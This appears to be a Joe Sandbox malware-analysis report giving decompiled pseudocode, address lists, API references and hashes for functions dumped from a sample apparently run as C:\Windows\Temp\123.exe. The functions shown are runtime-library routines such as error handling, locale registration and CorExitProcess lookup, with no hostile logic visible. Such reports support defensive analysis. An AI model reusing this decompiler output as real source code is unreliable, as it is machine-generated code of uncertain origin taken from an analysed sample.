Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: e892fdc6b1c524c6346af2faf275cf7b3af060441e45ef1af0b8ce1f95a10e98
Instruction ID: bcfe552ed0afac57941b0231fb86066ed5177144101863afccc4d321036bf265
Opcode Fuzzy Hash: e892fdc6b1c524c6346af2faf275cf7b3af060441e45ef1af0b8ce1f95a10e98
Instruction Fuzzy Hash: 4EC1A0B9D002589FCF15CFA8C9809EDBBB5BF19314F28816AE855F7242D3319D42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019B23A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0019B23A(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1c3050 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0019C443(_t13,  *0x1c3050);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0019C47E(_t14,  *0x1c3050, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0019C583();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0019C47E(_t18,  *0x1c3050, 0);
								} else {
									_t8 = E0019C47E(_t18,  *0x1c3050, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0019FF29(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x0019b23a
0x0019b241
0x0019b254
0x0019b25b
0x0019b25d
0x0019b261
0x0019b27a
0x0019b27a
0x0019b263
0x0019b265
0x0019b278
0x0019b27f
0x0019b288
0x0019b28b
0x0019b28e
0x0019b2a2
0x0019b2a2
0x0019b2ab
0x0019b290
0x0019b297
0x0019b29d
0x0019b2a0
0x0019b2b4
0x0019b2b6
0x00000000
0x00000000
0x00000000
0x0019b2a0
0x0019b2b9
0x00000000
0x00000000
0x00000000
0x0019b278
0x0019b265
0x0019b2c1
0x0019b2cb
0x0019b243
0x0019b245
0x0019b245

APIs

GetLastError.KERNEL32(?,?,0019B231,0019996F,0019867B), ref: 0019B248
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019B256
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019B26F
SetLastError.KERNEL32(00000000,0019B231,0019996F,0019867B), ref: 0019B2C1

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 32d07361efa481631388d5ec3c0bcd64394172c3eb4954dafdc6cc7473a7ab03
Instruction ID: d26dddce849817a20ba5f81ae4d311b5df51c5cc738e20a0280eca4a6b8a303c
Opcode Fuzzy Hash: 32d07361efa481631388d5ec3c0bcd64394172c3eb4954dafdc6cc7473a7ab03
Instruction Fuzzy Hash: C701A73360D6115EAE2527F4BDC5AAF2B54EB127747204339F520469F1EF51AC516288

Uniqueness

Uniqueness Score: -1.00%

Function 001962C5 Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001962C5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t36;
				void* _t41;
				intOrPtr* _t64;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t78;

				_t71 = __edx;
				_t58 = __ebx;
				_push(8);
				E00198206(0x1b3751, __ebx, __edi, __esi);
				E00195D4D(_t78 - 0x14, 0);
				_t75 =  *0x1f0480; // 0x0
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
				_t36 = E0019181F( *((intOrPtr*)(_t78 + 8)), E0019178E(__ebx, 0x1f039c, __edx, __edi));
				_t73 = _t36;
				if(_t36 != 0) {
					L5:
					E00195DA5(_t78 - 0x14);
					return E001981D4(_t73);
				} else {
					if(_t75 == 0) {
						_push( *((intOrPtr*)(_t78 + 8)));
						_push(_t78 - 0x10);
						_t41 = E001967F4(__ebx, _t73, _t75, __eflags);
						_pop(_t64);
						__eflags = _t41 - 0xffffffff;
						if(__eflags == 0) {
							E00191664();
							asm("int3");
							_push(8);
							E00198206(0x1b378f, __ebx, _t73, _t75);
							_t76 = _t64;
							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
							 *((intOrPtr*)(_t78 - 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t78 + 0x10));
							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
								 *_t76 = 0x1b43e0;
								 *((intOrPtr*)(_t76 + 0x10)) = 0;
								 *((intOrPtr*)(_t76 + 0x30)) = 0;
								 *((intOrPtr*)(_t76 + 0x34)) = 0;
								 *((intOrPtr*)(_t76 + 0x38)) = 0;
								 *((intOrPtr*)(_t76 + 8)) = 0x1b43d4;
								 *(_t78 - 4) = 0;
								 *((intOrPtr*)(_t78 - 0x10)) = 1;
							}
							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0x1b43dc;
							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
							E00196CB1(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t71, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc))); // executed
							return E001981D4(_t76);
						} else {
							_t73 =  *((intOrPtr*)(_t78 - 0x10));
							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
							 *(_t78 - 4) = 1;
							E00196014(__eflags, _t73);
							 *0x1b4134();
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
							 *0x1f0480 = _t73;
							goto L5;
						}
					} else {
						_t73 = _t75;
						goto L5;
					}
				}
			}

0x001962c5
0x001962c5
0x001962c5
0x001962cc
0x001962d6
0x001962db
0x001962e6
0x001962ea
0x001962f6
0x001962fb
0x001962ff
0x00196344
0x00196347
0x00196353
0x00196301
0x00196303
0x00196309
0x0019630f
0x00196310
0x00196316
0x00196317
0x0019631a
0x00196354
0x00196359
0x0019635a
0x00196361
0x00196366
0x00196368
0x0019636d
0x00196370
0x00196373
0x00196375
0x0019637b
0x0019637e
0x00196381
0x00196384
0x00196387
0x0019638e
0x00196391
0x00196391
0x001963a3
0x001963af
0x001963b2
0x001963bb
0x001963bd
0x001963c9
0x0019631c
0x0019631c
0x0019631f
0x00196323
0x00196327
0x00196334
0x0019633c
0x0019633e
0x00000000
0x0019633e
0x00196305
0x00196305
0x00000000
0x00196305
0x00196303

APIs

__EH_prolog3.LIBCMT ref: 001962CC
std::_Lockit::_Lockit.LIBCPMT ref: 001962D6

Part of subcall function 0019178E: std::_Lockit::_Lockit.LIBCPMT ref: 001917AA
Part of subcall function 0019178E: std::_Lockit::~_Lockit.LIBCPMT ref: 001917C6

codecvt.LIBCPMT ref: 00196310
std::_Facet_Register.LIBCPMT ref: 00196327
std::_Lockit::~_Lockit.LIBCPMT ref: 00196347
Concurrency::cancel_current_task.LIBCPMT ref: 00196354

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: ecf4cc581e9b021a6c40eb8ee99b6687944a167ce90a8abb64715e04be78008b
Instruction ID: 37f6fd39576e120e5c6be027bd59d8a3ff5c281b297e2fbe095dfacab5f30ffc
Opcode Fuzzy Hash: ecf4cc581e9b021a6c40eb8ee99b6687944a167ce90a8abb64715e04be78008b
Instruction Fuzzy Hash: 0B01D235900116DBCF0AEBA4C845ABD77B2BFA4710F250418E4157B2D2DF309E45C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001ACBE1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001ACBE1(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E001AC142(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E001AC142(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0019FCEE(GetLastError());
									_t17 =  *((intOrPtr*)(E0019FD24(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E001A27F2(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0019FCEE(GetLastError());
						_t17 =  *((intOrPtr*)(E0019FD24(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E001A27F2(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E001A2877(_a8);
				return 0;
			}

0x001acbe7
0x001acbec
0x001acc00
0x001acc03
0x001acc35
0x001acc3d
0x001acc3f
0x001acc58
0x001acc5b
0x001acc5e
0x001acc6c
0x001acc7b
0x001acc83
0x001acc85
0x001acc9e
0x001acca1
0x001acca1
0x001acc87
0x001acc8e
0x001acc99
0x001acc99
0x001acca3
0x001acca4
0x00000000
0x001acca4
0x001acc63
0x001acc68
0x001acc6a
0x00000000
0x00000000
0x00000000
0x001acc6a
0x001acc48
0x001acc53
0x00000000
0x001acc53
0x001acc05
0x001acc08
0x001acc0b
0x001acc1e
0x001acc21
0x001acc23
0x001acc25
0x00000000
0x001acc25
0x001acc11
0x001acc16
0x001acc18
0x00000000
0x00000000
0x00000000
0x001acc18
0x001acbf1
0x00000000

Strings

C:\Windows\Temp\123.exe, xrefs: 001ACBE6

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Temp\123.exe
API String ID: 0-3534342833
Opcode ID: 59a9015d4d1b3a230b1dd081cb8114e84344aae299efbbf0289bd938fc525ea6
Instruction ID: cf20c4b422fddbf2ddc722cd5fcf2051c5059e302097db7432c1f0c9ff5176e2
Opcode Fuzzy Hash: 59a9015d4d1b3a230b1dd081cb8114e84344aae299efbbf0289bd938fc525ea6
Instruction Fuzzy Hash: C821C279200209BF9B20AF79DD84D6A77ADAF223B47108628F829D7151EB31EC4187E0

Uniqueness

Uniqueness Score: -1.00%

Function 001A32D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E001A32D6(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1b4134(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x001a32dc
0x001a32e0
0x001a32eb
0x001a32f3
0x001a32fe
0x001a3304
0x001a3308
0x001a330f
0x001a3315
0x001a3315
0x001a3317
0x001a331c
0x00000000
0x001a3321
0x001a3328

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001A3288,?,?,001A3250,00000000,00000000,?), ref: 001A32EB
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A32FE
FreeLibrary.KERNEL32(00000000,?,?,001A3288,?,?,001A3250,00000000,00000000,?), ref: 001A3321

Strings

mscoree.dll, xrefs: 001A32E4
CorExitProcess, xrefs: 001A32F6

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8c79f46d570b15798a808997fe05e538809a1b78b49d32c716a52aec655c56cb
Instruction ID: 4e4070967b8a2fa94f9eb13322e7a765c525e93dc0458c714301cea00178fa79
Opcode Fuzzy Hash: 8c79f46d570b15798a808997fe05e538809a1b78b49d32c716a52aec655c56cb
Instruction Fuzzy Hash: D4F08C35904218FBDF11AB94DD0ABEDBB78EF40756F044160F900A21A1CB708F40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B2A61 Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E001B2A61(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x1c3014; // 0x88921fa2
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E001A26ED(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E001A26ED(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E001AC0C6(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E001A871A(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E00198390(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E001AC0C6(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E001AC0C6(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E001A871A(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E00198390(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E001AC0C6(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E001A82FC(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E00197CA5(_t103);
													}
												}
											}
										}
									}
								}
								E00197CA5(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E00197F14(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x001b2a69
0x001b2a70
0x001b2a78
0x001b2a7b
0x001b2a81
0x001b2a84
0x001b2a87
0x001b2a8b
0x001b2a8e
0x001b2a93
0x001b2aa8
0x00000000
0x00000000
0x00000000
0x00000000
0x001b2a95
0x001b2a9d
0x001b2a9f
0x001b2aae
0x001b2aae
0x001b2ab3
0x001b2ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x001b2ab5
0x001b2abe
0x001b2acb
0x001b2acb
0x001b2ad0
0x001b2ad7
0x001b2ada
0x001b2ada
0x001b2adf
0x001b2aeb
0x001b2cd1
0x001b2cd1
0x00000000
0x001b2af1
0x001b2af4
0x001b2b7d
0x001b2b7f
0x001b2afa
0x001b2afd
0x001b2b42
0x001b2b42
0x00000000
0x001b2aff
0x001b2b0c
0x00000000
0x001b2b12
0x001b2b14
0x001b2b4c
0x00000000
0x001b2b4e
0x001b2b52
0x001b2b58
0x001b2b5b
0x001b2b5d
0x001b2b60
0x001b2b60
0x001b2b65
0x00000000
0x00000000
0x001b2b67
0x001b2b6b
0x001b2b75
0x001b2b7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b2b6b
0x001b2b60
0x001b2b5b
0x00000000
0x001b2b52
0x001b2b16
0x001b2b1a
0x001b2b20
0x001b2b23
0x001b2b25
0x001b2b25
0x001b2b2a
0x00000000
0x00000000
0x001b2b2c
0x001b2b30
0x001b2b3a
0x001b2b40
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b2b30
0x001b2b25
0x001b2b23
0x00000000
0x001b2b44
0x001b2b44
0x001b2b44
0x001b2b14
0x001b2b0c
0x001b2afd
0x001b2af4
0x001b2b85
0x001b2b85
0x001b2b85
0x001b2b92
0x001b2b97
0x001b2b9a
0x001b2b9f
0x001b2cd8
0x001b2cd8
0x001b2ba5
0x001b2ba8
0x001b2bad
0x001b2baf
0x001b2bb1
0x001b2bf4
0x001b2bf6
0x00000000
0x001b2bb3
0x001b2bb8
0x001b2bd5
0x001b2bda
0x001b2be0
0x00000000
0x001b2be6
0x001b2be6
0x00000000
0x001b2be6
0x001b2bba
0x001b2bba
0x001b2bbf
0x001b2bc1
0x001b2bc6
0x001b2cc3
0x001b2cc3
0x001b2bcc
0x001b2bcc
0x001b2bec
0x001b2bec
0x001b2bef
0x001b2bf9
0x001b2bfb
0x00000000
0x001b2c01
0x001b2c09
0x001b2c0f
0x001b2c14
0x001b2c19
0x00000000
0x001b2c1f
0x001b2c28
0x001b2c2d
0x001b2c30
0x001b2c35
0x00000000
0x001b2c3b
0x001b2c3e
0x001b2c43
0x001b2c45
0x001b2c47
0x001b2c7b
0x00000000
0x001b2c49
0x001b2c4e
0x001b2c69
0x001b2c6e
0x00000000
0x001b2c70
0x001b2c70
0x00000000
0x001b2c70
0x001b2c50
0x001b2c50
0x001b2c55
0x001b2c59
0x001b2cb7
0x001b2cb7
0x001b2c5b
0x001b2c5b
0x001b2c76
0x001b2c76
0x001b2c7d
0x001b2c7f
0x00000000
0x001b2c9a
0x001b2c9a
0x001b2cb3
0x001b2cb3
0x001b2c7f
0x001b2c59
0x001b2c4e
0x001b2cbb
0x001b2cc0
0x001b2c35
0x001b2c19
0x001b2bfb
0x001b2bc6
0x001b2bb8
0x001b2cc7
0x001b2ccd
0x001b2ccd
0x001b2b9f
0x001b2adf
0x001b2ab3
0x001b2cda
0x001b2ceb

APIs

GetCPInfo.KERNEL32(00CFF6F8,00CFF6F8,?,7FFFFFFF,?,?,001B2D1D,00CFF6F8,00CFF6F8,?,00CFF6F8,?,?,?,?,00CFF6F8), ref: 001B2B04
__alloca_probe_16.LIBCMT ref: 001B2BBA
__alloca_probe_16.LIBCMT ref: 001B2C50
__freea.LIBCMT ref: 001B2CBB
__freea.LIBCMT ref: 001B2CC7

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 28a1de95130a6ad6af31a847cee9a9c6f84a8ba2ca6c7adae1fd61b27646f2ca
Instruction ID: e6cce656a092de38dcf30cd982159ac03d42277b281544476ca2b29f0e6880be
Opcode Fuzzy Hash: 28a1de95130a6ad6af31a847cee9a9c6f84a8ba2ca6c7adae1fd61b27646f2ca
Instruction Fuzzy Hash: A281E472D0020A9BDF209FA4CD81EEEBFB9EF5A750F190155E814A7251EB31CC48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001AE0CB Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001AE0CB(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1c3070; // 0x1c30c4
					if(_t23 != 0) {
						E001A71B2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1c3074; // 0x1f0a5c
					if(_t24 != 0) {
						E001A71B2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1c3078; // 0x1f0a5c
					if(_t25 != 0) {
						E001A71B2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1c30a0; // 0x1c30c8
					if(_t26 != 0) {
						E001A71B2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1c30a4; // 0x1f0a60
					if(_t27 != 0) {
						return E001A71B2(_t6);
					}
				}
				return _t6;
			}

0x001ae0d1
0x001ae0d6
0x001ae0da
0x001ae0e0
0x001ae0e3
0x001ae0e8
0x001ae0ec
0x001ae0f2
0x001ae0f5
0x001ae0fa
0x001ae0fe
0x001ae104
0x001ae107
0x001ae10c
0x001ae110
0x001ae116
0x001ae119
0x001ae11e
0x001ae11f
0x001ae122
0x001ae128
